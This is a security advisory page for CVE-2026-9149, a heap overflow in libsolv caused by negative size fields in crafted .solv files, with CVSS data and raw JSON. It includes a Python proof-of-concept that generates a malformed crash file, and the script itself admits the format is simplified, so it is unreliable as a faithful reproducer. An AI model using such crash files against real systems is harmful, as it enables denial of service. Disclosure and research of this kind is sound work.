Security Vulnerability Report
CVE-2026-9149 CVSS 6.5 MEDIUM

Published: 2026-05-21 00:16:36
Last Modified: 2026-05-21 00:16:36

Description

A flaw was found in libsolv. This heap buffer overflow vulnerability occurs when a victim processes a specially crafted `.solv` file containing negative size values in the `repo_add_solv` function. This leads to an undersized memory allocation and a subsequent out-of-bounds write. An attacker could exploit this to cause a denial of service (DoS).

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

libsolv (versions before the fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import struct

# Proof of Concept for CVE-2026-9149
# This script generates a malformed .solv file with a negative size value.
# Note: The actual .solv file format structure is simplified here for demonstration.


def create_malformed_solv(filename):
    with open(filename, 'wb') as f:
        # .solv file header usually starts with magic bytes and specific format info
        # We simulate a header where a size field is set to a negative value
        # If the code reads this as a signed int and uses it for malloc, it causes issues.

        # Example Header Structure (Simplified)
        f.write(b'SOLV')  # Magic bytes
        f.write(struct.pack('<I', 1))  # Format version

        # Simulate a repository entry with negative size
        # Normally this would be a positive integer representing payload size
        negative_size = -1  # 0xFFFFFFFF in 32-bit two's complement if interpreted as unsigned

        # Writing the negative size as if it were a valid length field
        # Depending on parsing logic (signed vs unsigned), this triggers the bug
        f.write(struct.pack('<i', negative_size))

        # Write dummy padding to simulate file content
        f.write(b'A' * 100)


if __name__ == "__main__":
    print("Generating malformed .solv file...")
    create_malformed_solv("crash.solv")
    print("File created: crash.solv")
    # Usage: Load this file with a vulnerable version of libsolv.
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9149", "sourceIdentifier": "[email protected]", "published": "2026-05-21T00:16:35.630", "lastModified": "2026-05-21T00:16:35.630", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libsolv. This heap buffer overflow vulnerability occurs when a victim processes a specially crafted `.solv` file containing negative size values in the `repo_add_solv` function. This leads to an undersized memory allocation and a subsequent out-of-bounds write. An attacker could exploit this to cause a denial of service (DoS)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-9149", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460380", "source": "[email protected]"}, {"url": "https://github.com/openSUSE/libsolv/pull/617", "source": "[email protected]"}]}}